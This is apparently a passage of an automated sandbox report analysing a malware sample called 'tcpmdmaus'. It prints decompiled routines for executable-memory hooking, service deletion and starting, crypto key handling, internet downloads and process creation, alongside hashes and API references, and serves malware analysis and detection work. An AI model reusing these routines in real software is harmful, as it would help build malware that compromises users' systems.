String ID:
API String ID: 2039140958-0
Opcode ID: e65bdcf50790fcddbde26367123e6a8214de15f8d10eb45232b0b75e4376f650
Instruction ID: 0aeebf3da9efdc6a0176d4c5ee94bc1297dd5fe409aa68ad0f1b327f35763941
Opcode Fuzzy Hash: e65bdcf50790fcddbde26367123e6a8214de15f8d10eb45232b0b75e4376f650
Instruction Fuzzy Hash: 28C02B744102088AC6048B90DC0EDA6B33CDF00200F02D7DBEE0C83120ED3045048B05

Uniqueness

Uniqueness Score: -1.00%

Function 00CD70D0, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CD70D0() {
				int _t2;
				void* _t3;

				_t3 = 0;
				do {
					_t1 = _t3 + 0xcda850; // 0x76130000, executed
					_t2 = FreeLibrary( *_t1); // executed
					_t3 = _t3 + 4;
				} while (_t3 < 0x1c);
				return _t2;
			}

0x00cd70d1
0x00cd70d3
0x00cd70d3
0x00cd70d9
0x00cd70df
0x00cd70e2
0x00cd70e8

APIs

FreeLibrary.KERNELBASE(76130000,?,00CD758C,?,00CD7B68), ref: 00CD70D9

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8283661802bcc0f365bd7abe1164ade63c3b2ec183ee846615e81a04b5a0d684
Instruction ID: b5c746d0bb29cbdcce200d44fa00c60ea407eb8b956ca93af731bc621421b078
Opcode Fuzzy Hash: 8283661802bcc0f365bd7abe1164ade63c3b2ec183ee846615e81a04b5a0d684
Instruction Fuzzy Hash: 30B092328152308A9A302B2DBD4C6CBBB66AF01224307056BEC6B665A582256C92A6D6

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1B40, Relevance: 1.5, APIs: 1, Instructions: 8processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00CD1B44

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 6f8a9bccc6aec1fd48ca6dd8fa11fe785c95897e6cffded2ce46ec57a90b482a
Instruction ID: 8c791b33e5e2f0d490f34de9151ab201e70f6c4985c554f4d23dbc1586f54c79
Opcode Fuzzy Hash: 6f8a9bccc6aec1fd48ca6dd8fa11fe785c95897e6cffded2ce46ec57a90b482a
Instruction Fuzzy Hash: 60B092325066209783282238285C2AC9A904A8937072E1733AEBBE32E0B6208E439842

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1B78, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00CD1B91

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 372969fdab2dd7c0772277b3e8532862431452b024efd6ad8c561fae376c9516
Instruction ID: 0cf8837e5674e33a0b462b464124480c46f072f2157dcebd59f5a4f2088f064a
Opcode Fuzzy Hash: 372969fdab2dd7c0772277b3e8532862431452b024efd6ad8c561fae376c9516
Instruction Fuzzy Hash: B8B01230005602E3011002A01C3C7BE1A685A00340B1450139772B0400EB00CB01D016

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7C5D, Relevance: 1.5, APIs: 1, Instructions: 2COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 00CD7C5D

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 927017e921eb61358743c83fd87dae59c28dfba0937b65d8d29459e4a25304de
Instruction ID: 61f92ee1352673e4711e4cc10e15b820b36dcab576be9c9b023dcf08f4eacd4c
Opcode Fuzzy Hash: 927017e921eb61358743c83fd87dae59c28dfba0937b65d8d29459e4a25304de
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 007F23BE, Relevance: 1.4, APIs: 1, Instructions: 200
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E007F23BE(intOrPtr _a4, void* _a8) {
				char _v21;
				char _v26;
				char _v31;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				void** _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				void** _v84;
				char* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				void* _t121;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t167;
				char* _t168;
				void** _t173;
				void* _t178;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr _t214;
				intOrPtr _t217;
				intOrPtr* _t223;
				void** _t232;
				char* _t234;
				void* _t243;
				intOrPtr* _t244;

				_v36 =  &_v21;
				_v40 = _a4;
				_v44 =  &_v31;
				_v48 =  &_v26;
				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
				_t234 =  &_v21;
				_t168 =  &_v26;
				_v52 = _t121;
				_v56 =  &_v31;
				 *_v52 = 0;
				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
				_v64 = 4;
				_v68 = _v40 + _v60;
				_t130 =  ==  ? _v68 : 0;
				_v72 = _v56 + 1;
				_v76 = _t168 + 1;
				_v80 = _t234 + 1;
				_v84 =  &(_v52[1]);
				_v88 = _t168;
				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
				_v96 = _v64;
				_v100 = _t234;
				_v104 = 0xfffffffb - _v52;
				_v108 = 0;
				while(1) {
					_t191 = _v96;
					_v112 = _v108;
					_v116 = _t191;
					_t143 = _t191 + _v52;
					 *_v56 = 0xe8;
					 *_v72 = 0x7f2162 - _t143;
					_t173 = _v52;
					_v120 = _t143;
					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
					_t197 = _v116;
					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
					_t148 =  *((intOrPtr*)(0x7f304c + _v112 * 0xc + 4));
					_v124 = _t148;
					_t178 = _t148 + _v40;
					 *_v88 = 0xe9;
					_v128 = _v120 + 0xfffffffb - _t178;
					_v132 = _t197 + 5;
					 *_v76 = _v128;
					 *_v100 = 0xe9;
					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
					_v136 =  *((intOrPtr*)(0x7f304c + _v112 * 0xc + 8));
					_v140 =  *((intOrPtr*)(0x7f304c + _v112 * 0xc));
					_v144 = _v52 + _v132;
					_v148 = 0;
					do {
						_t157 = _v148;
						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
						_t158 = _t157 + 1;
						_v148 = _t158;
					} while (_t158 != _v136);
					_t244 = _t243 - 0x14;
					 *_t244 = _v40;
					_v164 = _v92;
					_v160 = _v124;
					_v156 = _v136;
					_v152 = _v144;
					E007F217A();
					_t243 = _t244 + 0x14;
					_t162 = _v116 + _v136;
					_t223 = _v36;
					_t232 = _v84;
					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
					_t164 = _v40;
					_t214 = _v124;
					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
					_t167 = _v116 + 0xe + _v136;
					_t217 = _v112 + 1;
					_v96 = _t167;
					_v108 = _t217;
					if(_t217 != 0x14e) {
						continue;
					}
					return _t167;
				}
			}

0x007f23ea
0x007f23ed
0x007f23f0
0x007f23f3
0x007f23f6
0x007f23ff
0x007f2407
0x007f240a
0x007f2410
0x007f2416
0x007f2422
0x007f2428
0x007f2433
0x007f2445
0x007f2454
0x007f245c
0x007f2469
0x007f2472
0x007f2478
0x007f247b
0x007f247e
0x007f2481
0x007f2484
0x007f2487
0x007f2497
0x007f249a
0x007f24b3
0x007f24b8
0x007f24be
0x007f24c3
0x007f24cb
0x007f24d2
0x007f24d5
0x007f24db
0x007f24e4
0x007f24e7
0x007f24fb
0x007f24ff
0x007f2505
0x007f250a
0x007f2515
0x007f251b
0x007f2521
0x007f2535
0x007f2547
0x007f255b
0x007f2561
0x007f2567
0x007f256d
0x007f2573
0x007f2573
0x007f2588
0x007f258b
0x007f2596
0x007f2596
0x007f259e
0x007f25a4
0x007f25aa
0x007f25b1
0x007f25bb
0x007f25c5
0x007f25c9
0x007f25ce
0x007f25da
0x007f25dc
0x007f25e1
0x007f25e4
0x007f25ea
0x007f25f3
0x007f25f6
0x007f25f9
0x007f2602
0x007f2612
0x007f2617
0x007f2620
0x007f2623
0x007f2626
0x00000000
0x007f262c
0x007f2496
0x007f2496

APIs

VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 007F23F6

Memory Dump Source

Source File: 00000005.00000002.403400241.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7f0000_tcpmdmaus.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 85d4ec52514c3e25cdce0d986dfed61eefba70b6f5cd4b4e38995a10aa66f364
Instruction ID: 2ccd89759e6184307016ac09dc0a416b7c2acbcea8286a3412ee8e0bd4e6896f
Opcode Fuzzy Hash: 85d4ec52514c3e25cdce0d986dfed61eefba70b6f5cd4b4e38995a10aa66f364
Instruction Fuzzy Hash: 5591E075E002198FCB14CFA8D890AACBBF1BF49314F1581AAE959EB391D730AD46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 003C4285, Relevance: 1.4, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 003C4446

Memory Dump Source

Source File: 00000005.00000002.403221303.00000000003C3000.00000020.00020000.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000005.00000002.403164007.00000000003B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.403172825.00000000003B1000.00000020.00020000.sdmp Download File
Associated: 00000005.00000002.403179139.00000000003B4000.00000020.00020000.sdmp Download File
Associated: 00000005.00000002.403204074.00000000003BD000.00000020.00020000.sdmp Download File
Associated: 00000005.00000002.403213945.00000000003BF000.00000020.00020000.sdmp Download File
Associated: 00000005.00000002.403232139.00000000003C9000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.403239843.00000000003CA000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.403248499.00000000003CC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.403255480.00000000003CD000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.403289038.00000000003E0000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.403308785.00000000003ED000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.403319751.00000000003F3000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.403326884.00000000003F9000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b0000_tcpmdmaus.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e922879f8799bae376b821e174a72aa6bce7290e03e31c2b940cf6e3bbb04bab
Instruction ID: 61ed7a6b9f94bf55bf314b8017f01903d0a359368cd0ddc33f9fffe44f55e38b
Opcode Fuzzy Hash: e922879f8799bae376b821e174a72aa6bce7290e03e31c2b940cf6e3bbb04bab
Instruction Fuzzy Hash: BD410675A093808FC365DF29D190B9BFBF1ABC8364F14891EE89987350DB3598498F82

Uniqueness

Uniqueness Score: -1.00%

Function 007F1DA8, Relevance: 1.3, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 007F1DEE

Memory Dump Source

Source File: 00000005.00000002.403400241.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7f0000_tcpmdmaus.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2e0ddd0efca3ece41e65d79c72edccad1f6509bc2e64a33ad5723e5ecd95c2e7
Instruction ID: 46b0d1192f3f14d8f6d39a6ad91d84c636efd42f5fac0826f5a637de02620075
Opcode Fuzzy Hash: 2e0ddd0efca3ece41e65d79c72edccad1f6509bc2e64a33ad5723e5ecd95c2e7
Instruction Fuzzy Hash: 343136B4A04209DFCB44DF68C59466EBBF1FF88314F60896DD848AB341D779A942CF91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00CD80BC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
serviceCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00CD80BC(void* __eax, void* __ecx) {
				void* _t13;
				int _t14;
				void* _t18;
				void* _t23;

				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *((short*)(_t23 - 4)) = 0;
				 *0xcda7cc(_t23 - 0x210, 0x104, _t23 - 8);
				_t13 = OpenServiceW(__ecx, _t23 - 0x210, 0x10000);
				_t18 = _t13;
				if(_t18 == 0) {
					goto 0xe31af0;
					asm("int3");
					asm("int3");
					return _t13;
				} else {
					_t14 = DeleteService(_t18);
					CloseServiceHandle(_t18);
					return _t14;
				}
			}

0x00cd80c3
0x00cd80ca
0x00cd80e0
0x00cd80f6
0x00cd80fc
0x00cd8100
0x00cd811a
0x00cd811f
0x00cd8120
0x00cd8121
0x00cd8102
0x00cd8103
0x00cd810c
0x00cd8119
0x00cd8119

APIs

_snwprintf.NTDLL ref: 00CD80E0
OpenServiceW.ADVAPI32(?,?,00010000), ref: 00CD80F6
DeleteService.ADVAPI32(00000000,?,?,00010000), ref: 00CD8103
CloseServiceHandle.ADVAPI32(00000000,?,?,00010000), ref: 00CD810C

Strings

%, xrefs: 00CD80C3

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Service$CloseDeleteHandleOpen_snwprintf
String ID: %
API String ID: 88604382-2567322570
Opcode ID: 831616520ff4ce6095866e1d327edc604ec8c0bec38f5e3cd446b9f9d061ec66
Instruction ID: 76edf6166644292274fd18b2c4685bb567f393f3e47675b0e0c7f200c820d6cd
Opcode Fuzzy Hash: 831616520ff4ce6095866e1d327edc604ec8c0bec38f5e3cd446b9f9d061ec66
Instruction Fuzzy Hash: 0AF0A772901218EBC711DBA8AC4CBEDB7BCEF48711F0805DBF915E3210EBB08A898755

Uniqueness

Uniqueness Score: -1.00%

Function 00CD2217, Relevance: 6.0, APIs: 4, Instructions: 14
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CD2217(void* __eax) {
				void* _t3;

				_t3 =  *0xcda628();
				if(_t3 == 0) {
					CryptDestroyKey( *0xcda878);
					CryptDestroyKey( *0xcda874);
					CryptReleaseContext( *0xcda870, 0);
					return 0;
				} else {
					goto 0xe30873;
					return _t3;
				}
			}

0x00cd221c
0x00cd2224
0x00cd2232
0x00cd223e
0x00cd224c
0x00cd2254
0x00cd2226
0x00cd2226
0x00cd222b
0x00cd222b

APIs

CryptCreateHash.ADVAPI32 ref: 00CD221C
CryptDestroyKey.ADVAPI32 ref: 00CD2232
CryptDestroyKey.ADVAPI32 ref: 00CD223E
CryptReleaseContext.ADVAPI32(00000000), ref: 00CD224C

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Crypt$Destroy$ContextCreateHashRelease
String ID:
API String ID: 4057265880-0
Opcode ID: e6bbf123cebf3efdcb36a105bd250884794558b5184b6abec03135165beda09d
Instruction ID: ec784975d542323ff4f3e29731d14b41322c87eb8009440d1aa457ff17ee0911
Opcode Fuzzy Hash: e6bbf123cebf3efdcb36a105bd250884794558b5184b6abec03135165beda09d
Instruction Fuzzy Hash: 87D06CB0117000DBDB022B70FC09B0D3BA1AB08712B084127BA02901B0CB62C453BA17

Uniqueness

Uniqueness Score: -1.00%

Function 00CD2261, Relevance: 6.0, APIs: 4, Instructions: 10
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CD2261(void* __eax) {

				 *0xcda648();
				CryptDestroyKey( *0xcda878);
				CryptDestroyKey( *0xcda874);
				return CryptReleaseContext( *0xcda870, 0);
			}

0x00cd2266
0x00cd2272
0x00cd227e
0x00cd2292

APIs

CryptDestroyHash.ADVAPI32 ref: 00CD2266
CryptDestroyKey.ADVAPI32 ref: 00CD2272
CryptDestroyKey.ADVAPI32 ref: 00CD227E
CryptReleaseContext.ADVAPI32(00000000), ref: 00CD228C

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Crypt$Destroy$ContextHashRelease
String ID:
API String ID: 3577760690-0
Opcode ID: c79c810c50e591c47f4f824c46e8ff40f63c062523dad6011c293ef70ff1d043
Instruction ID: 4c3a7461fbcce435fe88e6102635169062c3389c2f86dc2fac7d3c1e9fb8de36
Opcode Fuzzy Hash: c79c810c50e591c47f4f824c46e8ff40f63c062523dad6011c293ef70ff1d043
Instruction Fuzzy Hash: 0BD0C5B1057000EFDB023BA0ED09B0C3B61EB08302B084127FA02801B08AA1C493AB07

Uniqueness

Uniqueness Score: -1.00%

Function 00CD81F7, Relevance: 4.5, APIs: 3, Instructions: 15
serviceCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00CD81F7(void* __edi) {
				int _t2;
				void* _t6;
				void* _t9;
				int _t11;

				_t9 = __edi;
				_t11 = StartServiceW(??, ??, ??);
				_t2 = CloseServiceHandle(_t6);
				L00CD80B0(_t2, __edi);
				CloseServiceHandle(_t9);
				return _t11;
			}

0x00cd81f7
0x00cd81fe
0x00cd8200
0x00cd8208
0x00cd820e
0x00cd821c

APIs

StartServiceW.ADVAPI32 ref: 00CD81F7
CloseServiceHandle.ADVAPI32 ref: 00CD8200
CloseServiceHandle.ADVAPI32(00000000,?,?), ref: 00CD820E

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Start
String ID:
API String ID: 390812829-0
Opcode ID: 83d599f58d8d74d13f2d33e905b05ef1daf0f6ce813113cdadbf3bb9eb9445ac
Instruction ID: df70ec94af18ff9245942fd82051e944d61675d08c1c55990ff1f4f77e820ac7
Opcode Fuzzy Hash: 83d599f58d8d74d13f2d33e905b05ef1daf0f6ce813113cdadbf3bb9eb9445ac
Instruction Fuzzy Hash: 4EC01272702410C7871037687C4C77CF758E68952230C4397FD05C2220CE2598035683

Uniqueness

Uniqueness Score: -1.00%

Function 00CD2195, Relevance: 4.5, APIs: 3, Instructions: 15
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CD2195(void* __eax) {
				int _t8;
				void* _t10;

				_t8 = CryptImportKey();
				LocalFree( *(_t10 - 4));
				if(_t8 == 0) {
					CryptReleaseContext( *0xcda870, 0);
				}
				return _t8;
			}

0x00cd21a3
0x00cd21a5
0x00cd21ad
0x00cd21b7
0x00cd21b7
0x00cd21c3

APIs

CryptImportKey.ADVAPI32 ref: 00CD219A
LocalFree.KERNEL32(?), ref: 00CD21A5
CryptReleaseContext.ADVAPI32(00000000), ref: 00CD21B7

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Crypt$ContextFreeImportLocalRelease
String ID:
API String ID: 202888279-0
Opcode ID: 76d6e2b3c53101fa5569bd7fe2e991adbd69a0fe2b583a465de12309036b5b0c
Instruction ID: ffbcd740b2b6aa454747aca20b00688c0001d6afc0841586ba7d0db507ae31d7
Opcode Fuzzy Hash: 76d6e2b3c53101fa5569bd7fe2e991adbd69a0fe2b583a465de12309036b5b0c
Instruction Fuzzy Hash: 48D09E31A521249BCB216BA4AC0975C7B70E714751B050157FE0592360C7718D115686

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7EF4, Relevance: 3.0, APIs: 2, Instructions: 25serviceCOMMON

Download Yara Rule

APIs

EnumServicesStatusExW.ADVAPI32(?,?,00000030,00000003), ref: 00CD7F07
GetLastError.KERNEL32(?,?,00000030,00000003), ref: 00CD7F15

Part of subcall function 00CD1850: GetProcessHeap.KERNEL32(00000008,-00000040,00CD107F), ref: 00CD1853
Part of subcall function 00CD1850: RtlAllocateHeap.NTDLL(00000000), ref: 00CD185A

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Heap$AllocateEnumErrorLastProcessServicesStatus
String ID:
API String ID: 1360102720-0
Opcode ID: 2f335597a015351b32a73e6836a3a79fee2e1eaee215cc16f8e23fdd0b220d76
Instruction ID: 2709f5214cef0f34d95f7bd30dcc58eb91f0c1d9a6fac729555f730dd27656a9
Opcode Fuzzy Hash: 2f335597a015351b32a73e6836a3a79fee2e1eaee215cc16f8e23fdd0b220d76
Instruction Fuzzy Hash: 1EE09230A01201ABE7204B968C48B7F6A7DEB91741F10006FF112F2280DA709F08D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CD16D8, Relevance: 1.6, APIs: 1, Instructions: 63
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00CD16D8(void* __ecx, long* __edx, void* __eflags) {
				int _t18;
				long _t25;
				long _t30;
				long* _t31;
				int _t35;
				long _t38;
				void* _t41;

				 *(_t41 - 0x10) = __edx;
				 *(_t41 - 0xc) = __ecx;
				_t25 = L00CD1650(__ecx, __ecx, 5);
				_t38 = 0;
				_t35 = 0;
				if(_t25 == 0) {
					L11:
					return _t35;
				} else {
					_t30 = E00CD1850(_t25);
					 *(_t41 - 4) = _t30;
					if(_t30 == 0) {
						goto L11;
					} else {
						 *(_t41 - 8) = 0;
						if(_t25 == 0) {
							L9:
							_t18 = E00CD18C0(_t30);
							if(_t35 != 0) {
								goto L10;
							}
							goto L11;
						} else {
							while(1) {
								_t18 = InternetReadFile( *(_t41 - 0xc), _t30 + _t38, _t25 - _t38, _t41 - 8);
								_t35 = _t18;
								if(_t35 == 0) {
									break;
								}
								_t30 =  *(_t41 - 8);
								if(_t30 == 0) {
									L10:
									goto 0xe302f3;
									asm("int3");
									 *_t30 = _t18;
									 *(_t30 + 4) = _t38;
									goto L11;
								} else {
									_t38 = _t38 + _t30;
									_t30 =  *(_t41 - 4);
									if(_t38 < _t25) {
										continue;
									} else {
										_t31 =  *(_t41 - 0x10);
										 *_t31 = _t30;
										_t31[1] = _t38;
										return _t35;
									}
								}
								goto L12;
							}
							_t30 =  *(_t41 - 4);
							goto L9;
						}
					}
				}
				L12:
			}

0x00cd16d8
0x00cd16e3
0x00cd16eb
0x00cd16ed
0x00cd16ef
0x00cd16f3
0x00cd1766
0x00cd176e
0x00cd16f5
0x00cd16fc
0x00cd16fe
0x00cd1703
0x00000000
0x00cd1705
0x00cd1705
0x00cd170a
0x00cd1752
0x00cd1752
0x00cd1759
0x00000000
0x00000000
0x00000000
0x00cd1710
0x00cd1710
0x00cd1720
0x00cd1726
0x00cd172a
0x00000000
0x00000000
0x00cd172c
0x00cd1731
0x00cd175b
0x00cd175b
0x00cd1760
0x00cd1761
0x00cd1763
0x00000000
0x00cd1733
0x00cd1733
0x00cd1735
0x00cd173a
0x00000000
0x00cd173c
0x00cd173e
0x00cd1741
0x00cd1746
0x00cd174e
0x00cd174e
0x00cd173a
0x00000000
0x00cd1731
0x00cd174f
0x00000000
0x00cd174f
0x00cd170a
0x00cd1703
0x00000000

APIs

Part of subcall function 00CD1850: GetProcessHeap.KERNEL32(00000008,-00000040,00CD107F), ref: 00CD1853
Part of subcall function 00CD1850: RtlAllocateHeap.NTDLL(00000000), ref: 00CD185A

InternetReadFile.WININET(?,00000000,00000000,?), ref: 00CD1720

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFileInternetProcessRead
String ID:
API String ID: 1886106900-0
Opcode ID: 1e397eebd7ff4b00ab9dfe7727b5dc0e5346dc925e0cb50f0ef1223ea9414b1b
Instruction ID: 8539b3a703d21432c59ec9f8f1fd879c7972dfafea0897818c4d5d6b357005c1
Opcode Fuzzy Hash: 1e397eebd7ff4b00ab9dfe7727b5dc0e5346dc925e0cb50f0ef1223ea9414b1b
Instruction Fuzzy Hash: B9117076B01209AB9B14CEE9D9905AEB7B6EF84751B1A417FEE19D3310DB318E019B80

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1F76, Relevance: 1.5, APIs: 1, Instructions: 10processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.ADVAPI32 ref: 00CD1F76

Memory Dump Source

